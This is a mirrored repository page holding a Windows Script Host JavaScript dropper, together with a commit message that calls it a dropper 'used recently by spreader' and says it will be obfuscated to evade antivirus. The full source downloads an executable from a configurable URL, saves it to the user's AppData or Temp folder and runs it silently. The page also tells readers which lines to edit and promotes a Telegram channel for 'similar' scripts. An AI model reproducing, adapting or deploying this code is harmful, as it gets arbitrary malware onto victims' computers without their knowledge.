mirror of
https://github.com/bl4d3rvnner7/sourcescodes.git
synced 2025-12-16 16:34:05 +00:00
8048d11754
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain. 1️⃣ Download Payload The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl). var fileUrl = "https://url.com/windows.exe"; var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP"); httpRequest.open("GET", fileUrl, false); httpRequest.send(); 2️⃣ Save the Payload The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory. var stream = WScript.CreateObject("Adodb.Stream"); stream.Type = 1; // binary stream.open(); stream.write(httpRequest.responseBody); stream.savetofile(fileName, 2); // save to file stream.close(); 3️⃣ Execute the Payload After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution: ➡️.jar files are run using java -jar. ➡️.vbs and .wsf files are run using wscript. ➡️Other file types are executed directly. if (fileName.endsWith(".jar")) { shell.run("java -jar \"" + fileName + "\""); } else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) { shell.run("wscript \"" + fileName + "\""); } else { shell.run("\"" + fileName + "\""); } 🦅 To edit the script, edit line... ➡️ 10 for the fileName. ➡️ 11 for the fileUrl. ➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
42 lines
No EOL
1.5 KiB
JavaScript
42 lines
No EOL
1.5 KiB
JavaScript
/*
|
|
Scarletta's Lounge - https://t.me/+ZFUM798YLi5mODUy
|
|
|
|
This script was shared by @scarlettaowner, if you were interested in similar topic,dm me!
|
|
*/
|
|
try {
|
|
String.prototype.endsWith = function (suffix) {
|
|
var substring = this.substr(this.length - suffix.length);
|
|
return substring == suffix;
|
|
};
|
|
var shell = WScript.CreateObject("WScript.Shell");
|
|
var tempPath = shell.ExpandEnvironmentStrings("%temp%");
|
|
var appDataPath = shell.ExpandEnvironmentStrings("%appdata%");
|
|
var fileName = "windows.exe";
|
|
var fileUrl = "https://test/windows.exe";
|
|
var useTempPath = false;
|
|
if (useTempPath) {
|
|
fileName = tempPath + "\\" + fileName;
|
|
} else {
|
|
fileName = appDataPath + "\\" + fileName;
|
|
}
|
|
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
|
|
httpRequest.open("GET", fileUrl, false);
|
|
httpRequest.send();
|
|
if (httpRequest.status == 200) {
|
|
var stream = WScript.CreateObject("Adodb.Stream");
|
|
stream.Type = 1;
|
|
stream.open();
|
|
stream.write(httpRequest.responseBody);
|
|
stream.savetofile(fileName, 2);
|
|
stream.close();
|
|
if (fileName.endsWith(".jar")) {
|
|
shell.run("java -jar \"" + fileName + "\"");
|
|
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
|
|
shell.run("wscript \"" + fileName + "\"");
|
|
} else {
|
|
shell.run("\"" + fileName + "\"");
|
|
}
|
|
} else {
|
|
WScript.Echo("Expired link");
|
|
}
|
|
} catch (error) {} |